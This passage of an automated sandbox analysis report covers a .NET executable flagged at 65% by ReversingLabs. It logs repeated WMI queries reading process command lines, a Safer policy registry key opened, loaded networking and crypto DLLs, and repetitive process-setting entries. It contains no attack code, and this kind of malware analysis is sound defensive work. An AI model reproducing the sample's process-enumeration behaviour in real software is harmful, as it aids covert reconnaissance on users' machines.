      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3720
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7160
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6296
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4564
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4132
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6284
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3696
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4988
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2400
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7140
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3260
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2848
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1100
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2392
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7132
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1952
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6836
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4104
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6688
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6256
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4180
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1944
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6684
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2804
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4572
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1936
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3228
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6244
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 640
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7104
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 872
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1068
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6668
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2788
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 632
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3648
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2352
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5368
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6388
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1056
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5796
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7088
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7080
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4924
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2768
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6644
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5780
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1900
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1032
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1460
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1028
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6692
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4460
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6612
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5444
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4024
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1864
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4880
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3428
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3584
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 564
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3580
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1424
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 992
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5300
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5728
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1416
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2704
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6780
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4424
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1836
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3128
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1400
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3984
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5276
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6564
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2684
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 528
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1820
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2484
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 92
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1384
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5692
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3536
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7096
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2240
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6980
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6976
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 504
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6708
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2656
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4208
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 496
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1788
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 924
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4800
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6952
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6164
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1344
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2636
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2204
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4524
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6556
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6080
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2628
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5932
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6504
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3484
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2188
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4772
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2616
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6984
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3512
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1324
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4764
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2172
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4324
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 444
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2596
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6040
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2588
      Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 0
      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: file.exeReversingLabs: Detection: 65%
      Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848E9794A push ebx; retf 0_2_00007FF848E9796A
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848E97C5E push eax; retf 0_2_00007FF848E97C6D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848E97C50 pushad ; retf 0_2_00007FF848E97C5D
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF848EAE715 pushad ; retf 0_2_00007FF848EAE778
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
